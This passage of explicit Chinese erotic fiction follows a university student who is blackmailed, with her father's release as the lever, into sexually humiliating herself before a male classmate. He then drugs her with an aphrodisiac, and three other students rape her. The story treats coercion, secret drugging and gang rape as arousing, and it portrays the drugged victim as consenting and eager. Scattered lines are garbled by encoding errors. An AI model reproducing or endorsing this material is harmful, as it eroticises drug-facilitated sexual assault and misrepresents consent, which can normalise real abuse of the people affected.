      梁婉儀無比后悔當初的決定,以為這樣可以保持貞潔,最多口頭上讓江龍羞辱,現在她發現,這口頭的羞辱根本就是羞辱她的尊嚴,肖揚是在肉體上被他奸淫,而她是在尊嚴上被他奸淫。是的,她說這些羞辱的話根本就是等同與被江龍奸污!她太讓這個惡少得意了!可是現在一切已經晚了,她只有拋棄所有的自尊與驕傲,去滿足眼前這個惡少,換取父親的自由。

      梁婉儀猶豫了片刻接著說道︰“見不到你的時候,我……我偷偷……偷偷地……手淫!”梁婉儀費了極大的努力才說出這兩個字。

      “真的嗎?原來外表那么高傲的梁婉儀小姐也手淫?”江龍笑道。

      “是的,別看我高傲,但一想到你……就忍不住想……手淫?!?br>
      “很好,很好!”江龍拍手道︰“那么我倒很好奇高傲的梁小姐是怎么手淫的,請你表演一下吧!”

      “不行!決不可以!”梁婉儀道。

      “別忘記了我們的約定,你必須做任何我要你做的動作!”江龍道。

      梁婉儀后悔自己當初考慮太少,以為不讓江龍碰自己就可以了,沒想到江龍會有這么下流的要求。為了救父親只有這么做,可是這怎么可以呢!當著這個惡少的面手淫,這太屈辱,太讓他滿足了!

      “反正選擇權在你!”江龍翹著二郎腿道。他知道,現在他是完全占據了上風。

      梁婉儀站在那里,絕望地進行著思想斗爭。最后可憐的父親憔悴的面孔再度浮現在她的腦海里,救父親的責任和望終于戰勝了羞恥感。

      “我……我是這樣手淫的……”梁婉儀伸出白晰的手,放到了自己的胸部。江龍滿意地看著這難得的一幕。

      “我一邊幻想著你,一邊用手撫摸我的……我的乳房?!绷和駜x說著開始用手隔著衣服摸弄自己的胸部。

      “江龍,我愛你,我愛你……”梁婉儀一邊喃喃地說著一邊將一只手伸進衣服里去摸弄乳房,另一只手則向下伸進短裙里,撥開三角褲,撫摸自己的陰戶。

      “嗯,挺熟練的嘛!”江龍笑說。

      “因為我為了你已經手淫了無數次了,其實……其實那天你和李浩比賽籃球時……我看見你的……英姿……就忍不住躲在人群里像現在這樣……手淫。??!江龍,你太帥了!你太英俊了!你太健美了!??!我愛你!我愛你!”

      天??!這是怎樣的景像??!任何一個正直的人看見了都會心痛不已的??!

      “很好!不過那天因為有人,所以你只有這樣手淫,今天就我們倆,你就可以脫得光光地手淫了,是不是,也可以讓你的心上人我仔細欣賞欣賞。如果你手淫得好,說不定我會接受你的愛呢!”

      終于要裸體了!梁婉儀雖然早有思想準備,可是讓她這個高傲而且自從發育以后就從來沒有在任何男性面前裸露過的玉體的少女裸露,實在需要太大的勇氣了。

      “拋棄你的自尊吧!”江龍得意地說︰“你們斗不過我的,在我面前,你已經不再是那個萬人迷戀的富家小姐了,你是被我征服的無數女孩的一個而已,懂嗎?你是被征服者,沒有什么尊嚴、驕傲!”

      梁婉儀羞憤得滿臉通紅,可是她卻無法反駁江龍的話,就算正義終有伸張的那天,也決不是現在!現在,她沒有選擇。

      于是梁婉儀緩緩道︰“是,其實我一直盼望有這么個機會脫得光光地在你面前手淫!今天終于有機會了,我好高興??!我一定好好手淫給你看!我知道,像你這樣英俊瀟灑的男孩子,對女孩子要求一定很高??墒俏译m然很平凡,卻還是有幾分姿色的,身材也還可以,只是你沒有機會看到,所以才會對我不理不睬,求你給我個機會展示我的裸體給你看吧!”天??!上二大最高傲的少女梁婉儀竟然求人讓她裸體??!

      “嗯,好吧,既然你這么想要,就脫光了給我看看吧!”江龍說完自己都有些得意,仿佛梁婉儀真的是愛死他似的。

      梁婉儀緩緩地、優雅地伸出手,脫去了上衣和內衣,里面是白色的縷花邊胸罩,接著,緩緩褪去了短裙。這樣上二大的美女梁婉儀就只剩下了白色的內褲和胸罩了。

      “你看,我的腿是不是很美?”

      “嗯,一般?!苯堁b腔做勢地說。什么一般!這明明是一雙潔白修長勻稱的美腿,整個上二大大概也找不出更完美的腿來??蓱z梁婉儀從小就被異性的贊譽所包圍,今天低聲下氣地求別人看自己的玉體,竟然還被別人這樣不屑!她的自尊受到極度的打擊。而這正是江龍的目的,其實他早已經對梁婉儀完美的身材驚嘆不已了。江龍自從初二玩弄了第一個少女,他班上那個神氣高傲又美麗的班長后,玩弄的少女不下一百個,而像梁婉儀這樣的,絕對是極品中的極品。

      “那我的……乳房發育得挺好的?!绷和駜x說著將手伸到背后,解開胸罩扣子,脫去了胸罩。一對潔白高聳的乳房裸露了出來,第一次展現在一個男生的面前。梁婉儀羞澀得閉上了美目。

      終于讓這個惡少得逞了,終于讓他觀賞自己的玉體了!

      “嗯,太小了點!”江龍又說,其實梁婉儀的乳房同她1米69的身材配合得天衣無縫,根本是很完美的尺寸。

      梁婉儀漲紅了臉,伸手撫弄她的粉紅色的乳頭︰“我就是這么手淫的,??!江龍!我愛你!”

      這撩人的景像幾乎讓江龍無法控制,但是他還是克制住了自己。梁婉儀撫弄了一會兒她的乳房,然后伸手去脫她的小巧的內褲。內褲沿著勻稱的大腿,曲線優美的小腿,小巧的腳踝緩緩脫去,梁婉儀姿態優雅地分別翹一翹她的兩只腳,脫去內褲,也脫去了精美的涼鞋。

      此時,上二大四大美女之一的梁婉儀終于在江龍面前一絲不掛了。

      梁婉儀婷婷地站在那里,任由江龍肆意觀賞,觀賞她的美乳、玉腿,和下腹淡黑色的陰毛。

      “江龍,你看我美不美?”梁婉儀用討好的語調說,然后微微掰開她的腿,將手伸進胯間,摸弄陰戶。

      江龍看得欲火中燒,他強忍住欲火,道︰“我看不清楚,你躺到地下,分開腿?!?br>
      梁婉儀滿腔羞憤,卻還是順從地躺下,緩緩地分開兩條長腿。她那神圣的少女羞處,終于毫無保留地開啟在江龍的面前!梁婉儀的淚水終于再次流了出來。

      “哈哈哈哈……哈哈哈哈!”江龍滿足的笑聲回蕩在房間里。

      梁婉儀伸出纖長的手指,撥開她那粉紅的肉縫,一邊逗弄自己那顆陰蒂。

      “江龍!??!??!我愛你!我渴望被你征服!我渴望成為你的女奴,伺候你!??!江龍!求你接受我的愛吧!”梁婉儀屈辱地說著。

      “別傻了,你實在太難看了,身材也太一般!”江龍強忍欲火,說道。

      “噢不!江龍!求你了!”梁婉儀說著起來跪倒在江龍的身前︰“求求你,求求你……”

      “哈哈哈哈……哈哈哈哈……”江龍發出無比滿足的狂笑。

      梁婉儀痛苦地跪在地上,低著她高傲的頭顱。天!這樣的羞辱要持續一個禮拜!

      第七回 看到自己心中的女神被玩弄

      嘈雜的男生寢室,晚上熄燈前。

      陳卓開門走進自己的寢室,里面有三個男生正在興奮地聊著什么,他們是他的同在新聞系三年級的同學“傻胖子”、“阿流”和“宋狗”。三個人是系里出了名的混日子的人,大多數人只知他們的綽號,甚至忘了他們的真實姓名。陳卓對他們有說不出的討厭。三人看見陳卓進來便停止了說話。

      大家各自洗臉刷牙,很快便熄燈。

      這一晚不知怎么,陳卓失眠了,翻來覆去睡不著。大約過了一點,他聽到阿流他們三人又開始講話。

      “你們猜我昨天在放映廳偷看到江龍搞誰?”阿流極興奮地說。

      “誰?”另兩人忙問。

      陳卓便知道阿流又在夸耀他的無恥勾當。阿流原來是學生中心放映廳的放映員,經常利用那里同人看黃色錄像、鬼混。自從江龍來了以后,利用自己的權勢霸占了放映廳。阿流雖然氣憤,卻也高興,因為江龍經常在那里玩弄學校里或校外的美女,他便經常躲到放映室隔壁的機房里偷窺,過干癮。

      陳卓覺得心,但是他睡不著,而他們三人的聲音雖然低,卻還是清晰地傳到他耳朵里。

      “梁.婉.儀!”阿流一個字一個字地說。

      “什么,梁婉儀!”傻胖子大叫︰“不可能吧?”

      “那么高傲的女孩子江龍也泡得到?”宋狗說。

      陳卓的心情可想而知,這三個猥瑣的混蛋說說別的女孩滿足一下自己的變態欲望也就算了,居然這次污辱他心中如女神般的梁婉儀!他攥緊拳頭幾乎想蹦起來揍胡說八道的阿流。但身為學生干部的他終于克制住。

      “騙你們不是人,”阿流道︰“他們明晚約好還是在那里?!?br>
      “我也要看,我也要看!”傻胖子和宋狗大叫。

      “給我五十塊,我帶你們去!”阿流說。

      “太多了吧!”

      “詐自己兄弟的錢!”

      三人討價還價,兩人終于答應付給阿流一共八十塊。

      陳卓當然認為傻胖子和宋狗是給阿流騙了錢了。梁婉儀會和江龍約會?這簡直是太陽從西邊出來!但陳卓是聰明的人,心中還是有點疑問。

      首先,阿流他們三個雖然平時就嘴里對梁婉儀不干不凈,常一起幻想著奸污她,但這次阿流似乎沒必要編造一個江龍玩弄梁婉儀的故事,因為編造這個一點快感也沒有。至于騙錢,三個人是死黨,又住一起,抬頭不見低頭見,阿流沒有這么傻吧?但是陳卓又無論如何不會相信梁婉儀真的會同江龍約會!他連想都不想。

      但不知為什么,盡管他拚命跟自己說別信阿流那種小流氓的胡說,他還是不斷地想這件事。竟然一個晚上都沒有睡著。

      第二天晚上九點,盡管陳卓對自己說了一千遍沒有必要,他還是鬼使神差地上了活動中心7樓。他是學生會干部,有放映廳隔壁社團部辦公室的鑰匙?,F在錄像已經散場,整個7樓都沒有人。陳卓開門進了辦公室,他沒有開燈。不一會兒,他聽到走廊上傳來腳步聲,然后是說話聲,然后是開機房門的聲音。他聽出是阿流他們。

      不一會兒,走廊上又響起了腳步聲,腳步聲進入了隔壁的放映室,然后燈亮了。陳卓果然看見了江龍。

      十平米左右的放映控制室左右各有一扇窗子,一邊是機房,也就是阿流他們藏身的地方,一邊是社團辦公室,也就是陳卓所在的地方。當放映室亮燈而另外兩邊不亮的時候,江龍根本無法看見兩邊房間的情況,何況,江龍根本沒想到現在那里會有人。

      陳卓狠狠地盯著坐在放映室里悠閑的江龍。江龍確實高大英俊,難道他心中清純的美少女梁婉儀,真的被蒙蔽了眼睛而甘心投入這個花花公子的懷中?不會的,不會的。陳卓反復告訴自己,梁婉儀那么高傲,才看不上江龍呢!可是如果不是約會,江龍來這里干什么?是了,是同別的女孩子約會。阿流看錯了,阿流在胡說!對,一定是這樣!

      江龍拿出兩罐飲料,打開,在其中的一罐里撒入了一些黃色的藥粉。然后繼續悠閑地坐著。陳卓則依然在那里忐忑,腦海里出現了梁婉儀高傲美麗的神情。啊,女神!

      就在這時,有敲門聲。江龍臉上露出了微笑,他去開門。走進來一個修長的少女。

      陳卓只感到頭“嗡”地一聲。走進來的這個少女,穿著淺藍色的連衣短裙和肉色長絲襪,露出無與倫比的美腿,長發飄逸,似乎隔墻也能聞到。她,不是他心目中的女神梁婉儀又是誰!

      天啊,她真的跑到這里來見江龍。瞧她的樣子,明顯是精心打扮過的!不,她來這里不一定是來同江龍約會的,她只不過找他有事。到了這個地步,陳卓依然想出理由來欺騙自己,因為他實在不相信梁婉儀成為江龍的玩物。

      “你終于來了?!苯埞首骼涞卣f。

      “龍,我好想你呀!我一直盼著來見你呢!”這是梁婉儀同江龍約定的最后的一天。已經被迫說了六天那么羞恥的話的梁婉儀,此刻已經能很自然地說出這些令江龍滿足的話了。

      可是旁邊偷看的陳卓卻痛苦地驚呆了。原來都是真的,阿流講的都是真的!唉,沒想到連梁婉儀這樣高傲的少女也會被江龍外表的英俊瀟灑所迷惑,他明明是個紈子弟??!

      “龍,你看我今天漂不漂亮???”梁婉儀優雅地扭動一下身軀,令陳卓心中一蕩。

      “很一般嘛,這個樣子你怎么指望讓我接受你的求愛呢!”江龍裝作不耐煩地說。

      “可是,龍,我的生命中不能沒有你??!”梁婉儀哀求地說。

      什么!陳卓簡直不相信自己的耳朵。江龍啊,江龍,你是人嗎!這么漂亮的少女向你求愛,你是多大的福氣??!可是你居然不接受!簡直是混蛋??!陳卓心中替梁婉儀惋惜。為什么低聲下氣地求這種人愛你??!

      “龍,那天你說我的乳房不夠大,我這兩天……一直自己撫摸自己的……乳房,你看是不是大了一點?”梁婉儀說。

      什么,梁婉儀居然為了這個惡少每天撫摸自己的乳房,這景像……陳卓不覺下面硬了起來。

      “大什么大呀!我才不要看呢”江龍輕蔑地說。

      “龍,那到底要我怎樣你才肯接受我的愛呢?”梁婉儀哀求。

      “這樣吧,”江龍冷笑著拿起桌上的一支圓珠筆︰“你把它塞進自己的屁眼里,我就接受你的愛?!?br>
      陳卓氣得簡直想破窗而入揍江龍。如果他不喜歡梁婉儀也就算了,怎么可以這么羞辱一個高傲的女孩呢!

      梁婉儀猶豫一番終于說︰“這是你最后的要求嗎?”

      “是的,”江龍道︰“我已經玩夠了?!?br>
      “好,我插?!绷和駜x說。

      不!不要!陳卓心中吶喊。

      梁婉儀從江龍手中接過了圓珠筆,撩起自己的短裙……陳卓一下子勃起到極點。此時他的心中無比矛盾,又不想讓婉儀這么做,讓江龍羞辱,卻又想看一看自己朝思暮想的夢中情人的屁股。

      梁婉儀緩緩將自己的白色內褲沿著光滑的大腿脫到膝蓋,由于仍舊有短裙垂下來遮掩,陳卓只能若隱若現地看見梁婉儀下腹的陰毛和翹翹的屁股,但是這足以讓他血脈賁張了!天啊,江龍一定早看過了,一定全看過了!他嫉妒地想。

      梁婉儀將手從后面伸進短裙,陳卓看不到她具體的動作,只看到她美麗的臉皺起了眉頭。過了一會兒,她說︰“我……插好了?!?br>
      “翹起來讓我看看!”江龍冷冷說。

      梁婉儀順從地轉過身,跪下,然后高高翹起屁股,短裙向腰間滑落……梁婉儀豐滿雪白的臀部完全露了出來,在那兩片肥白的屁股中間的溝里,插著一支圓珠筆!

      陳卓感到嘴唇一熱,發現自己鼻血噴了出來。這一幕太撩人了!

      可惜他在側面,無法看清楚梁婉儀的菊花蕾和那條肉縫??墒墙埧匆娏?,他看得清清楚楚!陳卓嫉妒得發狂!

      這時江龍伸手握住圓珠筆,往梁婉儀屁眼里狠狠一插。

      “??!”梁婉儀慘叫一聲跳起來。

      “不許碰我!”梁婉儀道。

      “我沒有碰到你,我碰的是圓珠筆?!苯埿χf︰“我沒有違反規定?!?br>
      “好,你羞辱夠了,”梁婉儀從屁眼里拔出筆,拉起內褲說︰“什么時候放了我父親!”

      原來如此!陳卓恍然大悟。梁婉儀原來是受了江龍的脅迫的。本來嘛,她怎么可能喜歡江龍呢!陳卓如釋重負,卻又為梁婉儀在江龍面前露屁股而心痛。不過從他們的對話里可以知道,梁婉儀沒有讓江龍碰過她,她還是純潔的,這樣一想陳卓又好受了一些。

      “別急嘛,喝點水?!苯垖⒆郎系娘嬃线f過去。

      梁婉儀喝下,七天的羞辱讓她習慣了對江龍的順從。

      江龍用難以察覺的微笑看著梁婉儀將飲料喝下,說︰“你隨時可以去接你的父親,我會安排的,三天以后你去找刑偵科的沈科長吧!”

      梁婉儀點點頭。

      江龍倒還守信,陳卓心道。只要婉儀父親獲救,他就不能再要挾婉儀了??祀x開這里吧,婉儀。陳卓心道。

      可是梁婉儀卻仍然站在那里。美麗的小臉似乎變得越來越紅,她的眼光也有些迷離起來。

      “好……好熱啊?!绷和駜x有些迷糊地說。

      陳卓大驚,想起剛才看見江龍往飲料里撒藥粉,一定是春藥!這畜生怎么肯不碰婉儀的身體呢!

      “熱就把衣服脫了吧!”江龍微笑說。

      “這……怎么……可以呢!”梁婉儀越來越迷糊地說︰“熱死了啦!”

      怎么辦?眼看被春藥迷惑的梁婉儀就要任由江龍的擺布。陳卓想︰如果沖進去,江龍會大怒,萬一他不肯放婉儀的父親怎么辦?對了!陳卓靈機一動。

      他走出辦公室,故意用很重的腳步走到放映室門口,敲門。

      “江龍在嗎?”他說。

      過了一會兒,一臉不滿的江龍將門開了一條縫︰“是你,什么事?”

      “噢,你真的在這,嗯……林老師……召集我們開會……討論晚會的事?!标愖空f。

      “現在?這么晚?”江龍極不耐煩地問。

      “嗯,對,很緊急?!?br>
      “嗯,好吧?!苯垷o可奈何,閃身出來,鎖上門。

      “走吧?!?br>
      陳卓沒想到這么順利,便同江龍一起乘電梯到了一樓。

      “在哪里?”江龍問。

      “在……文科樓……林老師的辦公室?!标愖亢f一個地方。

      “那走吧?!苯堈f。

      陳卓一邊走一邊盤算下一步怎么辦。文科樓很遠,兩人默默地走了約十五分鐘路。

      “下一步怎么辦?”江龍打破沉默。

      “什么下一步怎么辦?”陳卓不解。

      “我問你呀,等我們到了文科樓看不到林老師,你怎么解釋,想好了嗎?”江龍冷笑著問。

      “這個……”

      “怎么樣,好看嗎?”

      “什么……好看嗎?”陳卓尷尬無比。

      “裝什么傻,我問你梁婉儀的屁股好看嗎?”江龍道︰“我知道你一直在偷看,怎么樣,梁婉儀應該是你的暗戀對像吧?”

      被江龍全部說中心事,陳卓尷尬無比,漲紅了臉。

      “江龍,你太卑鄙了,利用婉儀對她父親的愛,占她的便宜!你是混蛋?!?br>
      “我當然是混蛋了,”江龍笑說︰“不過當個可以看上二大最美的美女的屁股的混蛋總比當個只能暗戀她的傻瓜好!”

      “我是喜歡婉儀,可我不是傻瓜?!标愖苛x正詞嚴地道︰“我一定會讓你這個混蛋得到應有的下場的!”

      “你還不是傻瓜嗎?”江龍哈哈大笑︰“你想想,我既然知道你的目的,為什么這么乖地跟你出來?”

      “這個……”

      “今天來偷窺的不止你一個吧?”江龍說。

      陳卓頓時感到五雷轟頂。

      “那三個小流氓里面的阿流他曾經在放映廳做過事,他當然有放映室的鑰匙了。我給梁婉儀服的春藥呢,是最先進的,再高傲保守的女孩子,也會變成淫娃蕩婦……”

      “??!”陳卓大叫一聲轉身就狂奔。

      “傻瓜!”江龍得意地在陳卓背后大叫。

      天??!陳卓心急如焚,他和江龍走了有一刻鐘,又講了十分鐘話,他跑回去也要五分鐘。天??!半個小時里,被春藥迷惑了心志的梁婉儀同阿流他們三個流氓在一起,會發生什么?陳卓簡直不敢想。

      他奔進中心。電梯,電梯,快呀,快!他沖進7樓的走廊。放映室關著,他不顧一切地一腳踢開門。里面什么人也沒有!

      無數可能性在陳卓腦海里掠過。

      婉儀她……一定回寢室了,對她回寢室了,她沒事的。陳卓安慰自己,他在中心每個角落都找了一邊,又在學校里跑了一圈,什么也沒有發現。他去到梁婉儀的寢室樓前,時間太晚阿姨已經不肯傳呼。他感到自己要發瘋了,這半個多小時里到底發生了什么?


      十二點,寢室關門的最晚時間,陳卓筋疲力盡地回到寢室里。阿流、傻胖子和宋狗已經都在寢室里。

      陳卓裝作若無其事,卻忍不住偷偷地觀察他們三人的表情,他越看越感到難受,因為那三個小流氓的臉上有著明顯的掩飾不住地帶著興奮。似乎在陳卓進來之前,他們正在熱烈地交流些什么。

      不會的!陳卓還是拚命讓自己相信。梁婉儀一定是自己回去了,那三個混蛋興奮只是因為看見了梁婉儀翹起屁股時的綽約風姿!對,一定是這樣,梁婉儀怎會讓他們這三個流氓占便宜呢?不會的,決不會的!梁婉儀這樣的高傲少女一定能戰勝春藥,保持清醒的!對了,梁婉儀這么神圣不可侵犯,三個小流氓哪里敢碰她。陳卓編織著千萬個理由。

      十二點準時熄燈。陳卓當然翻來覆去睡不著,他故意不睡,因為他想聽他們三人的夜談,當然,他裝出呼吸均勻的樣子。到了大約一點鐘,傻胖子終于開始輕聲說話。

      “陳卓應該睡著了吧?”

      “肯定睡著了!”宋狗道。

      “不管怎樣,說輕點!”阿流道。

      陳卓當然繼續裝睡,聽他們說什么。他心中涌起極度的緊張,就像在等待一場審判的結果。

      “你們說,要是陳卓知道今天的事,會怎么樣?”傻胖子笑說。

      “肯定瘋了!自己暗戀已久的夢中情人竟然心甘情地讓他最瞧不起的三個人給玩了,他當然會發瘋的!”宋狗說。

      “最有趣的是,這個機會還是他給我們創造的!”阿流道。

      三人同時輕笑。

      “阿流啊,阿流,你可是破了我們學校最美的美女的處女之身??!”傻胖子說。

      “媽的,你不是后來也插了嗎?”阿流說道︰“第一次緊得要命,有什么好的?”

      “緊才爽嘛!”宋狗說。

      陳卓睡在那里只感到一把尖刀插進了心臟!他一直擔憂的事情終于被證明發生了,他的所有的自欺欺人再也沒有用了!梁婉儀,他認為世界上最純潔,最美麗的少女,剛才在放映室里被如此猥瑣的三個混蛋輪奸了。而最令陳卓痛心的是宋狗說的“心甘情”四個字!冰清玉潔的梁婉儀不光是被他們輪奸了,還是在春藥的作用下心甘情愿的!也就是說,當阿流或是傻胖子干梁婉儀的時候,她還是很有快感地配合他們!那會是怎樣的景像??!陳卓實在不敢想像。

      “我還真希望讓陳卓知道,氣死他,誰叫他那么看不起我們!”宋狗說。

      “對,要是他知道他的夢中情人被我撩起短裙摸屁股時還對我嬌嗔‘討厭,不要啦!’的話,他肯定嫉妒得發狂?!鄙蹬肿诱f。

      天,梁婉儀果然迷失了自己!陳卓雖然心痛,可是聽到傻胖子說摸梁婉儀屁股時,竟然下面硬了起來!他暗罵自己沒用,竟然在幾個自己看不起的混蛋談論怎么玩弄自己夢中情人時勃起!可是陳卓無法遏制自己,他甚至希望他們再多說點,說得越詳細越好!

      “她的胸罩真好看!”宋狗說︰“結果他媽的被你扯壞了!”

      “我解不開嘛!”傻胖子說。

      “笨蛋,那種是無帶的胸罩!”阿流說。

      “阿流,你說是梁婉儀的大腿好看還是肖揚的好看,她們的腿都好長哦!”宋狗。

      “他媽的,我又沒把肖揚脫了褲子看過,怎么知道!”

      “我喜歡腿長的女孩穿長絲襪,太性感了!”傻胖子。

      “我同意!”宋狗。

      “那為什么你還是把她的絲襪脫了?”

      “那當然有意義了,這叫一絲不掛!你懂嗎,只有這樣,我們才可以自豪地宣稱,上二大四大美女之一的梁婉儀在我們面前一絲不掛過!”

      “一絲不掛算什么,不是連她的小洞洞也讓我們插過了嗎!連江龍都沒插過哩!”

      “真是做夢都沒想到??!”

      “對了死胖子,你也太不懂憐香惜玉了!”宋狗。

      “你是說……”

      三人淫笑。

      “我他媽的當然是說那支圓珠筆了!”

      三人又笑。

      “梁婉儀的玉體實在太美了,連屁眼都那么美,你們不想插嗎?”

      “再說,她自己不是也插過嗎?”

      “對了,你用圓珠筆插她屁眼時,她說什么來著……”

      三人又狂笑。

      “啊,胖哥哥,你壞死了,”傻胖子學著梁婉儀的腔調︰“你不要搞我的屁眼啦!”

      三人笑得越來越放肆。陳卓聽倒這里又憤怒又心痛。心目中女神一樣的美少女不僅被三個流氓輪流搞了她的生殖器,居然連肛門也被他們肆意污辱,天??!

      “她居然叫你胖哥哥!”宋狗狂笑著說︰“我發現,越是高傲和正經的女孩子,一旦意亂情迷時,就顯得越撩人,越嫵媚?!?br>
      “這算什么發現啊,本來就是事實?!?br>
      “我還有一個發現,就是陳卓越看不起我們,這件事對他的打擊就越大!”

      “嘿嘿,這正是江龍的目的?!卑⒘髡f︰“這么漂亮的女孩,他不搞,送給我們搞,為什么?他就是知道陳卓看不起我們,所以用這個辦法羞辱他?!?br>
      “那陳卓現在到底知不知道?”

      “管他呢!我敢打賭,他就是知道也裝不知道,他才不見我們的得意樣子呢!”

      陳卓在床上緊緊握住拳頭。又憤怒、又無奈,他不得不承認,江龍的目的達到了!

      “對了,阿流,龍哥剛才打電話說什么?”

      “嘿嘿,告訴你們樂死你們,江龍剛才打電話給我,對我說,他給梁婉儀吃的春藥是日本最先進的,有一種‘藥力保留’效力,喝了春藥的少女,無論她多么矜持、多么高傲,都會不可遏制地渴望同她見到的男人做愛!之后,在大約三天的時間內,她會對藥力第一次發作時干過她的男人產生不可遏制的情欲。也就是說,這三天里,梁婉儀就像是瘋狂愛上我們了一樣,我們的任何要求她都會毫無保留地答應,無論她多么高傲,都會放下架子,拜倒在我們面前!”

      阿流此話說完,傻胖子和宋狗幾乎要振臂歡呼。而陳卓幾乎吐血。什么!這太可怕了,這才是江龍更可怕的目的吧!徹底地羞辱婉儀,徹底地羞辱他!

      “太好了,太不可思議了!”

      “江龍萬歲!”

      三個得志的小流氓歡呼著。

      陳卓咬著牙齒,緊緊地攥著拳頭,緊緊地……

      第八回 “愛”上三個流氓的高傲美少女

      第二天一早是政治理論課,這是大課,陳卓他們系同梁婉儀她們系一起上。

      快上課時,陳卓走進大教室,看見阿流他們坐在后排,正在興奮地議論著什么,然后好像是在抓鬮,結果傻胖子歡呼了一聲。

      陳卓坐下,不一會兒,梁婉儀穿著緊身的牛仔褲翩然走了進來,天??!這個純潔的少女已經不再是處女了!陳卓心痛地想。

      只見,傻胖子站起來,嬉皮笑臉地到梁婉儀跟前說話。梁婉儀看到傻胖子,高傲的神情立刻消失,變得又溫順又羞澀,完全是一個少女看見自己心上人的表情。傻胖子好像提出什么要求,梁婉儀羞澀地點點頭,然后兩人竟然雙雙悄悄從大教室的后門走了。這種大課,本來就不點名的。

      陳卓暗說不好,一定是抓鬮輪到傻胖子先去“享用”婉儀。陳卓想到這里,不顧學生干部以身作則,也從后門溜了出去。

      早晨第一節課時的校園靜悄悄的。梁婉儀順從地跟著傻胖子,傻胖子只有1米60那么高,而梁婉儀卻是那么修長,兩人極不協調。

      傻胖子領著梁婉儀進了他們的寢室樓,走進了他們寢室,關上門。

      陳卓心急如焚,此時的寢室樓幾乎沒人,寢室里本來就住他們四個,傻胖子可以在里面對“愛”著他的梁婉儀為所欲為!陳卓悄悄地接近自己的寢室門口,趴在門上聽。

      “婉儀妹妹,你今天為什么穿牛仔褲呢?穿裙子多好!”是傻胖子的聲音。

      “就是為了不讓你占便宜啦!啊……別嘛!你再這樣,人家以后不來你寢室了?!边@是梁婉儀的聲音。

      “這皮帶扣怎么解不開?”傻胖子帶著喘息的聲音。

      畜生!陳卓暗罵。

      “嘻嘻,就不讓你解開嘛!??!不!不要!”梁婉儀俏皮的嬌嗔。

      “解開嘍!”傻胖子的歡呼。

      陳卓著急地透過鎖孔朝里看,只見嬌俏修長的梁婉儀正被矮胖的傻胖子屁股朝上橫抱在床上,傻胖子正奮力剝梁婉儀的緊身牛仔褲,而梁婉儀則撩人地亂蹬著兩條長腿掙扎。這是怎樣不協調的景像啊,一個修長高貴的美麗少女在一個矮胖猥瑣的男生的逗弄下嬌滴滴地扭動。

      梁婉儀穿著極緊身的牛仔,緊緊包裹著她纖細的長腿和豐圓的臀部。傻胖子費盡了力,盡管已經解開梁婉儀的皮帶扣,但在她俏皮的掙扎下卻無法將褲子剝下,急得他直喘。而梁婉儀絲毫沒有了以往的高傲和矜持,竟然像個溫順的小女生般被傻胖子擺弄。

      “不要啦,你們寢室里的同學回來怎么辦?”梁婉儀邊扭動屁股,邊將纖細的小手伸到腰際抵抗。

      傻胖子哪里肯依!自己一直用來做第一手淫對象的美少女梁婉儀此刻再次溫香軟玉地躺在自己懷里掙扎!傻胖子伸手到梁婉儀撅起的俏麗屁股上隔著牛仔褲粗暴地亂摸。

      “嘻嘻,婉儀妹妹的屁股真肉感!”傻胖子道,拚命地將手從梁婉儀的后面往她胯間伸。

      當然肉感了,要知道,這可是全校男生夢寐以求的美少女的屁股??!

      梁婉儀被傻胖子亂摸屁股,只有用手去抵抗。傻胖子趁機又用另一只手去解婉儀的褲子。梁婉儀的皮帶本已經被他解開,此刻被他狠命地拉,立刻露出了她腰際雪白的肌膚和白色三角褲的一部分。受了視覺刺激的傻胖子更是用力扒梁婉儀的褲子。

      眼看梁婉儀的屁股馬上要露出來,陳卓大力地在門上猛擊了兩下,然后迅速逃入旁邊廁所。過了一會兒,寢室門開。

      “真可怕,以后別在你們寢室亂來了啦!”已經束好皮帶的梁婉儀從寢室出來。

      “不要緊的,可能是哪個推銷員?!鄙蹬肿语@然正在興頭上。

      “我走了啦!”梁婉儀說。

      “你走我就生氣了!”傻胖子擺架子。

      “別嘛!”梁婉儀口氣立刻軟了。

      “那就來吧!”傻胖子又將手伸向梁婉儀的腰際,梁婉儀掙扎,傻胖子順勢將她一把推進盥洗室。

      “真的不能脫,會被別人看見的!”

      “現在沒人,都在上課呢!”

      此刻由于梁婉儀是站著,加上她本來就不是拼了命的掙扎,所以隨著梁婉儀的一聲嬌嗔,傻胖子終于將梁婉儀的緊身牛仔褲連同內褲一起剝到了膝蓋。

      天??!潔白如玉的兩條大腿裸呈在盥洗室窗戶照進來的柔和光線下,因羞澀而刻意夾緊雙腿的景像無比撩人,加上渾圓豐滿的兩片屁股和下腹一叢淡黑色的陰毛,讓任何男人都會無法遏制沖動!

      廁所和盥洗室一門之隔,陳卓躲在門口看了個清楚。他立刻猛烈地勃起,常年的暗戀此刻帶給他巨大沖動,幾乎讓他忘了她的夢中情人是在被一個丑陋的胖子玩弄!當他意識到時,他早已經沒有沖出去制止的勇氣。因為他決不想讓傻胖子他們知道他知道他們奸淫過他的心上人!因為這會讓他們得意,讓他們滿足。也或許是因為他其實心里不想讓這撩人的一幕停止。

      傻胖子的手立刻兇猛地伸向梁婉儀的下體,緊身牛仔褲繃在梁婉儀的膝蓋,加上梁婉儀的小手拚命抵抗,傻胖子無法將手伸到梁婉儀的胯間,他于是又繞到她后面用手扒開她的兩片屁股。梁婉儀是背對著陳卓這邊,所以陳卓可以清晰地看見傻胖子肥大的手扒開梁婉儀豐滿的屁股,用粗大的食指摳弄梁婉儀的肛門。

      陳卓開始喘息。

      “??!”梁婉儀嬌喘︰“別、別搞我這里嘛!”

      “搞你哪里???”傻胖子故意問。

      “搞我的……屁眼啦!你壞死了,上次被你在放映廳插了支筆,人家痛了好幾天呢!”梁婉儀啐道。

      “那就讓我搞你的小洞洞吧!”傻胖子說著,又用力將梁婉儀的牛仔褲剝到腳踝。這樣,梁婉儀的美腿就全部裸露了出來,陳卓又看見了梁婉儀曲線優美的小腿。

      “啊,不可以,這里不可以……”梁婉儀用僅有的理智抗拒。

      “我受不了了!我要,我要!”傻胖子一只手伸進梁婉儀衣服里去摸弄她的乳房,另一只手拚命亂摸梁婉儀的屁股和下身。

      “真的不行啦!”梁婉儀掙扎。傻胖子繞到梁婉儀背后,迫使她彎下腰,這樣他可以從后面摸到梁婉儀的小洞洞,察覺了他的企圖的梁婉儀掙扎著逃開。天??!這是什么景像??!上二大男生們夢寐以求的美少女此刻竟然赤裸著下身,褲子纏在腳踝上笨拙地跑動!

      當然,她很快又被傻胖子捉住。

      “真的不行啦,你又沒有……沒有那個……懷孕了怎么辦?”梁婉儀嬌嗔。

